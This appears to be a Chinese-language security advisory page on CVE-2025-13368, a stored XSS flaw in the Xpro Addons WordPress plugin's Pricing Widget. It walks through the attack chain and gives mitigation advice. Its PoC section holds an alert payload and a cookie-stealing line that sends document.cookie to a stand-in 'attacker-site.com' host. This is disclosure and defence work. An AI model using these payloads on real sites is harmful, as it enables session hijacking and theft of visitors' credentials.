IPBUF安全漏洞报告
English
CVE-2025-13368 CVSS 6.4 中危

CVE-2025-13368: Xpro Addons插件存储型XSS漏洞

披露日期: 2026-04-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-13368
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Xpro Addons — 140+ Widgets for Elementor

相关标签

Stored XSSWordPressWordPress PluginElementorCWE-79Xpro Addons

漏洞概述

WordPress插件Xpro Addons — 140+ Widgets for Elementor在1.4.20及之前版本中存在存储型跨站脚本(XSS)漏洞。该漏洞源于Pricing Widget的'onClick Event'设置缺乏充分的输入清理和输出转义机制。拥有贡献者及以上权限的认证攻击者可利用此漏洞在页面中注入任意Web脚本,进而导致访问该页面的用户触发恶意代码执行。

技术细节

该漏洞是由于WordPress插件Xpro Addons的Pricing Widget功能中未对“onClick Event”参数实施有效的输入验证和输出编码所致。在受影响版本(<=1.4.20)中,应用直接将用户提交的数据嵌入到HTML元素的事件处理器中,且未过滤危险的HTML字符或JavaScript关键字。攻击者需拥有Contributor或更高权限的账户。利用时,攻击者在编辑器中配置Pricing Widget,并在“onClick Event”字段注入恶意载荷(如javascript:alert(1)或更复杂的窃取Cookie脚本)。由于是存储型XSS,该载荷会被持久化保存到数据库。一旦目标用户访问包含该Widget的页面,载荷即被触发,浏览器解析并执行恶意脚本。攻击者可借此窃取敏感凭证、重定向用户或执行未授权操作。

攻击链分析

STEP 1
1. 获取权限
攻击者获取目标WordPress网站的Contributor(投稿者)或更高级别的账户凭证。
STEP 2
2. 注入载荷
登录后台,编辑页面或文章,插入Xpro Addons的Pricing Widget,在'onClick Event'配置中输入恶意JavaScript代码。
STEP 3
3. 持久化存储
保存页面更改,恶意脚本被存储在网站的数据库中,并成为页面内容的一部分。
STEP 4
4. 触发漏洞
诱导受害者(如管理员)访问包含恶意Widget的页面。
STEP 5
5. 执行攻击
受害者的浏览器解析页面时执行恶意脚本,可能导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2025-13368: Stored XSS in Xpro Addons Pricing Widget // 1. Log in as a user with 'Contributor' role or higher. // 2. Edit a page and add the 'Pricing Table' widget from Xpro Addons. // 3. In the widget settings, locate the 'Button Link' or 'onClick Event' field. // 4. Inject the following payload into the onClick Event field: javascript:alert('CVE-2025-13368_XSS'); // 5. Publish/Update the page. // 6. Visit the page as a regular user or admin. The alert should trigger. // Example payload to steal current user cookies (demonstration purpose only) // javascript:fetch('http://attacker-site.com/?c='+document.cookie);

影响范围

Xpro Addons — 140+ Widgets for Elementor <= 1.4.20

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用Xpro Addons插件中的Pricing Widget功能或完全停用该插件,直至应用补丁。同时,管理员应审查网站内容,移除任何可疑的第三方脚本注入。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表